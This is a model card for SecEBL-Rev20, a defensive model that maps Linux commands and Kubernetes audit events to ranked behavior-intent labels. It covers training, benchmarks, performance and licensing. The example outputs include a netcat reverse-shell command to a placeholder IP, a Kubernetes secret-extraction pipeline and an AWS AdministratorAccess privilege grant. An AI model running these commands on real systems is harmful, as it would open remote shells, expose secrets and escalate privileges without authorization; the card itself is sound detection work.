SecEBL-Rev20

SecEBL stands for Security Event Behavior Labeler.

SecEBL-Rev20 is an intent-recognition model for security telemetry. It maps a Linux command line or normalized Kubernetes AuditLog event into ranked behavior-intent labels, so downstream detection can reason about what an actor is trying to do instead of only matching fixed strings, allowlists, blacklists, or opaque risk scores.

Project repository: github.com/EBWi11/SecEBL

At A Glance

Area	Current release summary
Stable public API	L1 behavior-intent labeling with ranked `top_labels`.
Behavior vocabulary	361 Rev20 behavior-intent tags across 12 security behavior groups.
Training scale	86,285 internal corpus rows, 82,895 usable training observations, and 118,858 effective command/tag training pairs.
Corpus breadth	Linux commands plus normalized Kubernetes AuditLog events, covering roughly 2,700 distinct Linux first-token/tool forms and common security/operations tooling.
Benchmark scale	12,594-row internal Linux command benchmark covering all 361 behavior tags, 663 internal Linux sessions, and a 6,286,568-row / 102,117-session pressure stream.
L1 accuracy	98.49% top5 any-hit and 96.44% micro recall@5 on the internal Linux command benchmark; 100.00% top5 coverage on the K8s evaluation set.
Inference performance	RTX 5090 spot-check: mean 5,308.72 unique cmdlines/s with FP16 + SDPA; exact raw-event cache lookup measured separately at about 1.8M rows/s.
Training setup	`Alibaba-NLP/gte-modernbert-base`, MNRL with hard-negative-aware batches, RTX 5090 32GB, 128 full-pass epochs, batch size 112, about 16.2 hours.

The public examples include a reviewed, publicly releasable subset of the internal Linux final benchmark plus normalized Kubernetes AuditLog examples: 10,520 Linux rows across 531 sessions and 144 K8s rows across 46 sessions. They exist so users can run the model locally and inspect outputs without access to private telemetry. The full training corpora, full internal benchmarks, private pressure-stream rows, and private run logs are not redistributed because parts of them contain real telemetry or real operational context.

First-Time User Path

Use the companion GitHub repository for the runnable code and this Hugging Face repository for model artifacts:

git clone https://github.com/EBWi11/SecEBL.git
cd SecEBL

git lfs install
git clone https://huggingface.co/willchen0011/SecEBL model_artifacts

pip install -e .
scripts/run_examples.sh

After the script finishes, inspect:

runs/examples/linux_l1/predictions.jsonl
runs/examples/l2/example_linux_session_results.json

L1 is the stable behavior-labeling API. It outputs ranked behavior evidence, not an intrusion verdict. L2 is optional and experimental; it runs only when an L2 artifact such as model_artifacts/l2_artifacts/logreg.joblib is available.

What This Repository Contains

This Hugging Face repository is the model artifact bundle.

Path	Purpose
`model.safetensors`, tokenizer/config files	SentenceTransformers-compatible SecEBL-Rev20 embedding model.
`semantic_texts.jsonl`	Rev20 semantic label texts used by the L1 retrieval path.
`schema/tags_schema_rev20.json`	Canonical Rev20 behavior vocabulary, 361 tags across 12 groups.
`examples/linux/`	Public subset of the internal Linux final benchmark and matching Rev20 labels.
`examples/k8s/`	Public normalized Kubernetes AuditLog examples and matching Rev20 labels.
`examples/manifest.json`	Public example subset counts and distribution.
`rev20_tag_rfc.md`	Rev20 behavior-tag labeling RFC and boundary examples.
`l2_artifacts/logreg.joblib`	Experimental L2 logistic-regression session scorer.
`l2_artifacts/tag_risk_policy.rev20.json`	Matching L2 feature policy. Its tag-selection settings are internal to L2 feature extraction.
`l2_artifacts/train_summary.json`	Public aggregate L2 training/evaluation summary with no raw rows or real session identifiers.
`LICENSE`, `NOTICE`	Model license and attribution notices.

This repository does not include the runnable helper scripts. Use EBWi11/SecEBL for the Python package and one-command test script. The same public benchmark-subset examples are included here for convenience.

Output Shape

L1 predictions expose ranked top_labels:

{
  "observation_id": "event:0",
  "command": "nc -e /bin/sh 203.0.113.10 4444",
  "top_labels": [
    {
      "label_id": "spawn_reverse_shell",
      "score": 0.811,
      "axis": "execution_and_process"
    },
    {
      "label_id": "connect_external_service",
      "score": 0.488,
      "axis": "network"
    }
  ]
}

L1 does not emit behavior_tags and does not apply a user-facing tag-selection threshold. behavior_tags[] is the field used by training and evaluation label files. Runtime prediction output is ranked top_labels.
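As a minimal sketch of consuming this shape, the snippet below parses one prediction record and returns its ranked label ids. It relies only on the fields shown in the example above; the helper name `top_label_ids` is hypothetical and is not part of the companion package.

```python
import json

# One L1 prediction record, copied from the example above.
RECORD = """
{
  "observation_id": "event:0",
  "command": "nc -e /bin/sh 203.0.113.10 4444",
  "top_labels": [
    {"label_id": "spawn_reverse_shell", "score": 0.811, "axis": "execution_and_process"},
    {"label_id": "connect_external_service", "score": 0.488, "axis": "network"}
  ]
}
"""


def top_label_ids(record, k=5):
    """Return up to k label ids, highest score first (hypothetical helper)."""
    ranked = sorted(record["top_labels"], key=lambda item: item["score"], reverse=True)
    return [item["label_id"] for item in ranked[:k]]


prediction = json.loads(RECORD)
print(top_label_ids(prediction, k=1))
```

Because the output is a ranking rather than a thresholded tag set, any cut-off (top 1, top 5, or a score floor) is a choice made by the consumer.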

Why Intent Labels Matter

Traditional IDS pipelines often depend on signatures, rules, allowlists, blacklists, and low-explainability tabular ML. Those tools still matter, but they can struggle when legitimate tools are used in suspicious ways, when tool syntax drifts quickly, or when the same behavior appears in different telemetry formats.

SecEBL adds an intermediate representation:

raw security event
  -> L1 behavior-intent recognition
  -> L2 session reasoning or another downstream detector
  -> alert / review / policy

L1 intentionally does not decide that a single event is an intrusion. It produces explainable behavior evidence such as read_credential_material, execute_remote_command, create_scheduled_task, grant_cluster_privilege, or query_service_health.

This is useful for:

LOTL / living-off-the-land behavior where the tool is legitimate but the behavior may be suspicious in context.
Rule-writing lag, where new tool syntax appears faster than signatures can be maintained.
Multi-platform telemetry, where Linux commands, Kubernetes audit events, and future telemetry can share a behavior vocabulary.
Explainable detection, where an alert should be tied to explicit behavior labels rather than only an opaque score.

Data And Vocabulary

Rev20 is a flat behavior-tag schema.

Item	Count
Top-level behavior groups	12
Behavior tags	361

Schema groups:

Group	Tags
`observation_and_discovery`	51
`configuration_and_log_modification`	12
`filesystem_and_data`	33
`execution_and_process`	28
`network`	51
`identity_auth_and_secrets`	31
`persistence_services_and_storage`	27
`kernel_memory_and_tracing`	14
`package_build_and_source`	19
`database_and_infrastructure_services`	33
`containers_and_cloud_native`	34
`cloud_control_plane`	28

The release baseline was trained from internal Rev20 corpora:

Corpus	Rows	Unique behavior tags	Notes
Linux command corpus	85,277	361	Mixed generated, reviewed, and manually expanded command examples.
Kubernetes AuditLog corpus	1,008	40	Manually authored normalized K8s audit events.

The Linux corpus covers roughly 2,700 distinct first-token/tool forms by a conservative executable-name estimate. Common families include shell utilities, network tools, package/build tools, cloud CLIs, IaC tools, container tooling, databases, secret stores, and Kubernetes tooling.

Training Details

The raw training corpora are not redistributed, but the following details are documented so readers can understand the model scale and method.

Item	Value
Base model	`Alibaba-NLP/gte-modernbert-base`
Training objective	`MultipleNegativesRankingLoss` with hard-negative-aware batches
Training hardware	NVIDIA GeForce RTX 5090, 32GB VRAM, `cuda:0`
Epochs	128 full-pass epochs
Batch size	112
Precision	`fp32`
Steps	1,062 steps per epoch; 135,936 total optimizer steps
Runtime	58,291 seconds, about 16.2 hours
Sequence length	160 tokens
Optimizer schedule	learning rate `2e-5`, warmup ratio `0.06`, 8,156 warmup steps, weight decay `0.01`
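For readers unfamiliar with the training objective, the following is a rough pure-Python sketch of what a multiple-negatives ranking loss computes: each command embedding should score highest against its own label text, and every other label text in the batch acts as a negative. The scale of 20 and cosine similarity are the sentence-transformers library defaults and are assumed here; the release's actual loss settings and its hard-negative batch layout are not reproduced. The toy vectors are invented for illustration.

```python
import math


def cosine(u, v):
    """Cosine similarity between two equal-length vectors."""
    dot = sum(a * b for a, b in zip(u, v))
    norm_u = math.sqrt(sum(a * a for a in u))
    norm_v = math.sqrt(sum(b * b for b in v))
    return dot / (norm_u * norm_v)


def mnrl_loss(anchors, positives, scale=20.0):
    """Mean cross-entropy where the correct class for row i is column i."""
    total = 0.0
    for i, anchor in enumerate(anchors):
        logits = [scale * cosine(anchor, pos) for pos in positives]
        max_logit = max(logits)  # subtract the max for numerical stability
        log_sum_exp = max_logit + math.log(sum(math.exp(x - max_logit) for x in logits))
        total += log_sum_exp - logits[i]
    return total / len(anchors)


# Toy 2-D embeddings: two command anchors and two label-text embeddings.
commands = [[1.0, 0.0], [0.0, 1.0]]
labels_aligned = [[0.9, 0.1], [0.1, 0.9]]  # each label sits near its own command
labels_swapped = [[0.1, 0.9], [0.9, 0.1]]  # each label sits near the wrong command

print(round(mnrl_loss(commands, labels_aligned), 4))
print(round(mnrl_loss(commands, labels_swapped), 4))
```

The aligned batch yields a much smaller loss than the swapped one, which is why placing semantically close labels in the same batch makes the objective harder and more informative.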

Training data scale:

Training artifact	Count	Notes
Combined corpus rows	86,285	85,277 Linux command rows plus 1,008 K8s AuditLog rows.
Non-empty training observations	82,895	Rows with usable behavior labels after skipping 3,390 abstain rows.
Base command-tag pairs	117,092	Positive command/tag pairs before boundary upsampling.
Effective positive pairs	118,858	Final pair count after targeted boundary upsampling.
Behavior labels	361	Full Rev20 behavior vocabulary used on the label side.
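The figures in the two tables above are mutually consistent, which the short check below illustrates. It assumes that steps per epoch come from the effective pair count with the last partial batch kept, and that warmup steps are rounded down; neither rounding rule is stated in this card.

```python
import math

# Values copied from the tables above.
linux_rows, k8s_rows, abstain_rows = 85_277, 1_008, 3_390
effective_pairs = 118_858
batch_size = 112
epochs = 128
warmup_ratio = 0.06
runtime_seconds = 58_291

combined_rows = linux_rows + k8s_rows
usable_rows = combined_rows - abstain_rows
assert (combined_rows, usable_rows) == (86_285, 82_895)

steps_per_epoch = math.ceil(effective_pairs / batch_size)  # assumes the last partial batch is kept
total_steps = steps_per_epoch * epochs
warmup_steps = math.floor(warmup_ratio * total_steps)      # assumes rounding down
runtime_hours = runtime_seconds / 3600

print(steps_per_epoch, total_steps, warmup_steps, round(runtime_hours, 1))
# prints: 1062 135936 8156 16.2
```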

The Linux corpus is intentionally mixed rather than a single synthetic source. The largest source slices are roughly 36.9k generated rows, 28.5k manually reviewed rows, 4.0k benchmark-prune/migration rows, 3.6k common-difference gap rows, 2.7k reviewed generated rows, 2.6k baseline manual rows, and 2.3k attack batch rows, plus smaller targeted boundary, miss-review, public-attack, and high-miss batches.

Token lengths are short enough for a compact encoder. Across the final pair set, command-side text is p50 32 tokens, p90 55, p95 68, and p99 113; fewer than 0.3% of examples exceed the 160-token training limit. Label-side semantic texts are p50 40 tokens and p95 62.

Hard negatives were designed in two layers, followed by a boundary-upsampling step:

Schema-level negatives: the dataset builder used schema_hard, with a 16-item hard-negative pool and up to 8 negatives per positive before MNRL batching. These negatives come from semantically nearby Rev20 tags, so the model is forced to separate labels such as read-vs-search, inspect-vs-modify, local-vs-remote execution, and similar tool-boundary cases.
Batch-level negatives: the training loader used hard-negative-aware MNRL batches. The final run used config rev20_conservative_20260620_ep96_miss_v11, covering 74 difficult labels and placing 2 hard-negative labels near each anchor where possible.
Boundary upsampling: 1,766 boundary-sensitive pairs were duplicated once, producing 1,766 extra training exposures. These rows target recurring failure modes such as grep/read ambiguity, wrapper commands, tool-specific boundaries, no-hit review cases, and post-evaluation miss-review batches.
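The sizes quoted above (a 16-item pool, up to 8 negatives per positive, one extra copy of each boundary pair) can be pictured with the toy sketch below. How the real dataset builder ranks nearby tags and how it draws from the pool are not described in this card, so the seeded random sampling, the function names, and the example pairs are all assumptions made for illustration.

```python
import random


def pick_hard_negatives(positive_tag, neighbors, pool_size=16, max_negatives=8, seed=0):
    """Sample up to max_negatives tags from the pool_size nearest tags (assumed strategy)."""
    pool = [tag for tag in neighbors if tag != positive_tag][:pool_size]
    rng = random.Random(seed)
    return rng.sample(pool, min(max_negatives, len(pool)))


def upsample_once(pairs, is_boundary):
    """Append one extra copy of every boundary-sensitive pair."""
    return list(pairs) + [pair for pair in pairs if is_boundary(pair)]


# Toy neighbor ranking: 20 placeholder tags, nearest first.
neighbors = [f"nearby_tag_{i:02d}" for i in range(20)]
negatives = pick_hard_negatives("read_credential_material", neighbors)

# Toy command/tag pairs, not taken from the training corpus.
pairs = [
    ("cat /etc/shadow", "read_credential_material"),
    ("grep -r password /etc", "search_credentials"),
    ("uptime", "inspect_system_state"),
]
boundary_commands = {"grep -r password /etc"}  # hypothetical boundary-sensitive row
upsampled = upsample_once(pairs, lambda pair: pair[0] in boundary_commands)

print(len(negatives), len(upsampled))

# Pair counts reported in this card: base pairs plus duplicated boundary pairs.
assert 117_092 + 1_766 == 118_858
```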

Public Benchmark Subset

This Hugging Face repository includes the same public benchmark examples as the companion GitHub repository: the Linux benchmark subset under examples/linux/ and normalized Kubernetes AuditLog examples under examples/k8s/.

Public artifact	Rows	Sessions	Notes
`examples/linux/example_sessions.jsonl`	10,520	531	Publicly releasable subset of the internal Linux final benchmark; 2,934 normal-operation rows and 7,586 intrusion rows.
`examples/linux/example_gold.rev20.jsonl`	10,520	531	Matching Rev20 behavior labels; 10,019 labeled rows, 14,807 behavior-label instances, and 349 unique behavior tags.
`examples/k8s/example_sessions.jsonl`	144	46	Public normalized Kubernetes AuditLog examples; 72 normal-operation rows and 72 intrusion rows.
`examples/k8s/example_gold.rev20.jsonl`	144	46	Matching Rev20 behavior labels; 144 labeled rows, 163 behavior-label instances, and 27 unique behavior tags.

Session-level labels use English enums: normal_operation and intrusion. The full internal Linux benchmark remains larger: 12,594 rows, 663 sessions, and complete 361-tag coverage.

Evaluation Snapshot

The full internal benchmark data is not public. The aggregate size, distribution, and metrics are public so users can understand what the headline numbers mean.

Evaluation scale:

Dataset	Rows	Rows with labels	Behavior-tag instances	Unique behavior tags
Linux internal benchmark	12,594	11,889	17,287	361 / 361
K8s evaluation set	144	144	163	27 / 361
Combined	12,738	12,033	17,450	361 / 361

Retrieval quality:

Dataset	Dynamic exact	Top5 any-hit	Top5 all-covered	Micro recall@5
Linux internal benchmark	87.32%	98.49%	95.44%	96.44%
K8s evaluation set	99.31%	100.00%	100.00%	100.00%
Combined	87.47%	98.50%	95.50%	96.47%

The Linux benchmark covers the complete 361-tag Rev20 vocabulary and includes complex multi-tag command rows. The K8s result should be read as a small-domain sanity result rather than broad Kubernetes coverage because the current K8s corpus is much smaller than the Linux corpus.
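The sketch below shows one plausible reading of three of the column names: a row counts as a top5 any-hit if at least one gold tag appears in its top 5, as all-covered if every gold tag does, and micro recall@5 is the share of all gold tag instances found in the top 5. These definitions, and the choice to skip rows with no gold tags, are assumptions; this card does not define the metrics formally, and "Dynamic exact" is left out because its definition is not given.

```python
def top_k_metrics(gold_rows, ranked_rows, k=5):
    """Compute any-hit, all-covered, and micro recall at k under the assumed definitions."""
    scored = any_hit = all_covered = found = total_gold = 0
    for gold, ranked in zip(gold_rows, ranked_rows):
        gold_set = set(gold)
        if not gold_set:  # assumption: rows with no gold tags are not scored
            continue
        hits = len(gold_set & set(ranked[:k]))
        scored += 1
        any_hit += hits > 0
        all_covered += hits == len(gold_set)
        found += hits
        total_gold += len(gold_set)
    return {
        "any_hit": any_hit / scored,
        "all_covered": all_covered / scored,
        "micro_recall": found / total_gold,
    }


# Toy gold labels and ranked predictions using placeholder tag names.
gold_rows = [["a"], ["a", "b"], [], ["c", "d"]]
ranked_rows = [
    ["a", "x", "y", "z", "w"],       # the single gold tag is found
    ["a", "y", "z", "w", "v", "b"],  # "b" is ranked sixth, outside the top 5
    ["x", "y", "z", "w", "v"],       # unlabeled row, skipped
    ["x", "y", "z", "w", "v"],       # neither gold tag is found
]
metrics = top_k_metrics(gold_rows, ranked_rows)
print(metrics)
```

Under this reading, all-covered can never exceed any-hit, which matches the ordering of the reported numbers.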

Internal Linux benchmark tag cardinality:

Tags per row	Rows
0	705
1	8,829
2	1,567
3	901
4	402
5	139
6+	51

Top internal Linux benchmark tags:

Tag	Count
`stage_temporary_path`	987
`inspect_network_state`	801
`stage_hidden_path`	655
`inspect_current_identity`	578
`read_credential_material`	551
`inspect_system_state`	481
`inspect_infrastructure_service`	390
`query_dns_records`	372
`enumerate_filesystem`	365
`search_credentials`	315

Example Outputs

These examples show the user-facing L1 output style. Scores are cosine retrieval scores computed with the release prompt profile applied. The public helper scripts save the top labels in predictions.jsonl.

Event	Top 3 L1 tags	Note
`nc -e /bin/sh 203.0.113.10 4444`	`spawn_reverse_shell` 0.811 `connect_external_service` 0.488 `spawn_bind_shell` 0.451	`-e` is recognized as reverse-shell execution.
`nc -v 203.0.113.10 443`	`connect_external_service` 0.732 `spawn_reverse_shell` 0.503 `create_reverse_tunnel` 0.412	Connection intent ranks above shell-spawn intent.
`cat /root/install.log`	`read_business_log` 0.641 `read_system_log` 0.431 `read_workload_logs` 0.385	Log-read semantics dominate.
`cat /root/install.conf`	`read_infrastructure_config` 0.620 `read_system_config` 0.612 `read_kernel_parameter` 0.336	Config-read semantics dominate.
`kubectl -n prod get secret payment-api-token -o jsonpath={.data.token} | base64 -d`	`read_cluster_secret` 0.730 `decode_data` 0.716 `read_credential_material` 0.363	K8s secret extraction and decoding.
`aws iam attach-user-policy --user-name temp --policy-arn arn:aws:iam::aws:policy/AdministratorAccess`	`grant_cloud_privilege` 0.838 `modify_cloud_identity_policy` 0.535 `modify_cloud_identity` 0.459	Cloud privilege escalation semantics.
`curl -fsS http://127.0.0.1:8080/healthz`	`query_service_health` 0.840 `inspect_local_kubernetes_cluster` 0.459 `inspect_container_runtime` 0.383	Local service health check.

Runtime Performance

SecEBL-Rev20 is a SentenceTransformers-style embedding retriever over 361 Rev20 tag definitions. The serving path embeds the event, computes or loads the tag-definition embeddings, then ranks tags by similarity to the event embedding.

Current single-card CUDA recommendation:

Setting	Value
Precision	FP16
Attention	SDPA
`max_seq_length`	160
Batch size	224 default; 384 was slightly faster in one RTX 5090 sweep but not enough to replace the stable default
Sorting	`sort_by=char`
Padding	dynamic, no forced pad alignment
Output path	GPU tensor output plus GPU top-k

Measured on an NVIDIA GeForce RTX 5090 32GB spot-check:

Mode	Throughput
Recommended no-cache unique inference, `bs224`	mean 5,308.72 unique cmdlines/s
Recommended no-cache latency, `bs224`	about 0.1884 ms per unique cmdline
`bs224` repeat range	5,025.47 - 5,433.78 unique cmdlines/s
Best quick-sweep point, `bs384`	5,378.45 unique cmdlines/s

Exact raw-event cache lookup was measured separately at mean 1,817,462.76 rows/s. Cache hits reuse saved L1 top-k results and do not run model inference.
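A minimal sketch of the exact-match idea, assuming an in-memory dictionary keyed by the raw event string: repeated events return the stored top-k result and only unseen events reach the model. The class name, the `fake_l1` stand-in, and the dictionary storage are illustrative assumptions; the release's actual cache implementation is not described here.

```python
class ExactEventCache:
    """Memoize L1 top-k results by the exact raw event string."""

    def __init__(self, label_fn):
        self._label_fn = label_fn  # callable: raw event -> ranked top labels
        self._results = {}
        self.model_calls = 0

    def top_labels(self, raw_event):
        if raw_event not in self._results:
            # Cache miss: run the (expensive) labeler once and keep its result.
            self.model_calls += 1
            self._results[raw_event] = self._label_fn(raw_event)
        return self._results[raw_event]


def fake_l1(raw_event):
    """Stand-in for model inference; returns the same fixed list for any input."""
    return [{"label_id": "query_service_health", "score": 0.840}]


cache = ExactEventCache(fake_l1)
stream = ["curl -fsS http://127.0.0.1:8080/healthz"] * 3 + ["uptime"]
results = [cache.top_labels(event) for event in stream]
print(cache.model_calls)
```

On telemetry with many repeated command lines, most rows take the lookup path, which is why the cache figure is reported separately from unique-event inference throughput.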

L2 Artifact

This repository includes an experimental fitted L2 session scorer. When this model directory is used as MODEL_DIR, the companion GitHub scripts/run_examples.sh can run the public Linux and K8s L1 examples and then score the Linux example sessions.

In this release, a session is a sequence of events grouped by session_id. L1 labels each event independently. L2 scores the whole session by aggregating cached L1 ranked tags, retrieval scores, tag diversity, behavior transitions, and routine-operation context. The L2 output is a session-level verdict such as intrusion or normal_operation, not a replacement for per-command behavior tags.

For compatibility with the released L2 artifact, L2 derives its session features from cached L1 top_labels using an internal selected-tag feature path. In plain terms, L2 filters the cached ranked labels inside its own feature builder before session scoring. This does not change L1 prediction output: users still receive ranked top_labels, not a selected behavior_tags field.

Runtime L2 does not use raw command text, user names, host names, or session ids as scoring features. Session ids may appear in private data-prep workflows for label assignment, but they are not runtime allow/deny lists.
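To make the aggregation idea concrete, here is an illustrative sketch that groups cached L1 rows by session and derives a few session-level numbers from labels and scores only. It is not the released L2 feature builder: the `session_id` field on each row, the 0.5 score floor, and the feature names are hypothetical, and the sketch assumes `top_labels` is already sorted by descending score.

```python
from collections import defaultdict


def session_features(predictions, min_score=0.5):
    """Aggregate per-event top_labels into per-session features (illustrative only)."""
    sessions = defaultdict(list)
    for row in predictions:
        # Keep only labels above a hypothetical score floor.
        kept = [lab for lab in row["top_labels"] if lab["score"] >= min_score]
        sessions[row["session_id"]].append(kept)  # the id is used for grouping only

    features = {}
    for session_id, events in sessions.items():
        top_ids = [labels[0]["label_id"] for labels in events if labels]
        scores = [lab["score"] for labels in events for lab in labels]
        features[session_id] = {
            "event_count": len(events),
            "tag_diversity": len({lab["label_id"] for labels in events for lab in labels}),
            "mean_score": sum(scores) / len(scores) if scores else 0.0,
            # Count changes of the top label between consecutive events.
            "transitions": sum(1 for a, b in zip(top_ids, top_ids[1:]) if a != b),
        }
    return features


# Toy cached L1 rows for one session; the label ids come from the Rev20 vocabulary.
rows = [
    {"session_id": "s1", "top_labels": [
        {"label_id": "spawn_reverse_shell", "score": 0.811},
        {"label_id": "connect_external_service", "score": 0.488}]},
    {"session_id": "s1", "top_labels": [
        {"label_id": "read_credential_material", "score": 0.700}]},
]
feats = session_features(rows)
print(feats["s1"])
```

Note that the raw command text never enters the feature dictionary, in line with the statement above that runtime L2 does not score on raw commands, user names, host names, or session ids.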

Internal L2 summary:

Check	Result
Withheld Linux session benchmark	663 sessions, 365 TP, 298 TN, 0 FP, 0 FN
7M pressure-stream fit-check	6,286,568 rows, 102,117 sessions, 61 alert sessions
Out-of-fold (OOF) validation	5,747 sessions, 99.39% accuracy, 96.44% attack precision, 95.31% attack recall

The 7M pressure-stream result was measured on real background telemetry plus embedded synthetic attack sessions. The underlying rows and real session identifiers are not redistributed. The included L2 artifact is a research/reproducibility component, not a general production IDS claim.

Direct SentenceTransformers Loading

You can load the embedding model directly:

from sentence_transformers import SentenceTransformer

model = SentenceTransformer("willchen0011/SecEBL")

Direct loading gives you the encoder only. SecEBL is a retrieval-style labeler: encode the event, encode or load the Rev20 semantic label texts from semantic_texts.jsonl, rank labels by cosine similarity, and save the top-k labels. For normal use, prefer the companion GitHub helpers because they keep the prompt profile, semantic text loading, top-k output format, and optional L2 feature path aligned with this release.
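The retrieval steps described above can be sketched as follows. The ranking function is plain Python and runs on its own; `label_event` shows where the encoder would plug in and imports sentence-transformers lazily. This sketch does not apply the release prompt profile, so its scores may differ from the companion helpers, and it takes `label_ids` and `label_texts` as arguments because the field names inside semantic_texts.jsonl are not documented in this card. Both function names are hypothetical.

```python
import math


def cosine(u, v):
    """Cosine similarity; works on lists or NumPy rows."""
    dot = sum(float(a) * float(b) for a, b in zip(u, v))
    norm = math.sqrt(sum(float(a) ** 2 for a in u)) * math.sqrt(sum(float(b) ** 2 for b in v))
    return dot / norm if norm else 0.0


def rank_by_cosine(event_vec, label_vecs, label_ids, k=5):
    """Return the k labels whose embeddings are closest to the event embedding."""
    scored = [(label_id, cosine(event_vec, vec)) for label_id, vec in zip(label_ids, label_vecs)]
    scored.sort(key=lambda pair: pair[1], reverse=True)
    return [{"label_id": label_id, "score": round(score, 3)} for label_id, score in scored[:k]]


def label_event(command, label_ids, label_texts, model_name="willchen0011/SecEBL", k=5):
    """Encode one event plus the label texts, then rank (no prompt profile applied)."""
    from sentence_transformers import SentenceTransformer  # imported lazily

    model = SentenceTransformer(model_name)
    vectors = model.encode([command] + list(label_texts), normalize_embeddings=True)
    return rank_by_cosine(vectors[0], vectors[1:], label_ids, k)


# Toy 2-D vectors standing in for real embeddings.
toy_ids = ["spawn_reverse_shell", "query_service_health", "connect_external_service"]
toy_vecs = [[0.9, 0.1], [0.0, 1.0], [0.6, 0.4]]
ranked = rank_by_cosine([1.0, 0.0], toy_vecs, toy_ids, k=2)
print([item["label_id"] for item in ranked])
```

In a real deployment the label embeddings would be computed once and reused across events rather than re-encoded per call, as the serving path in this card describes.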

Intended Use

Research and evaluation of security-event behavior labeling.
Internal security detection, investigation, and triage for systems an organization owns, operates, administers, or is explicitly authorized to defend.
Building session-level risk scoring over SecEBL behavior-label streams.

Out Of Scope

Standalone verdicting on a single event.
Authorization or policy-compliance decisions without human validation.
Monitoring systems you are not authorized to defend.
Commercial security products, SaaS/API offerings, MDR/MSSP services, or third-party managed detection without a separate written commercial license.

License

The model artifacts are released under SecEBL Model License 1.0. This is an open-weight restricted-use model license, not Apache-2.0 and not an OSI-approved open source license.

The base model is Alibaba-NLP/gte-modernbert-base, which is Apache-2.0. Source code, schemas, public examples, public documentation, and helper scripts in the companion GitHub repository (EBWi11/SecEBL) are Apache-2.0 unless a file explicitly states otherwise. Public examples and documentation included in this Hugging Face repository follow that same companion-repository licensing unless a file explicitly states otherwise.

Commercial security offerings require a separate written commercial license.

Model size: 0.1B params (Safetensors, tensor type F32)

Model tree for willchen0011/SecEBL: answerdotai/ModernBERT-base (base model) -> Alibaba-NLP/gte-modernbert-base (finetuned) -> this model (finetuned)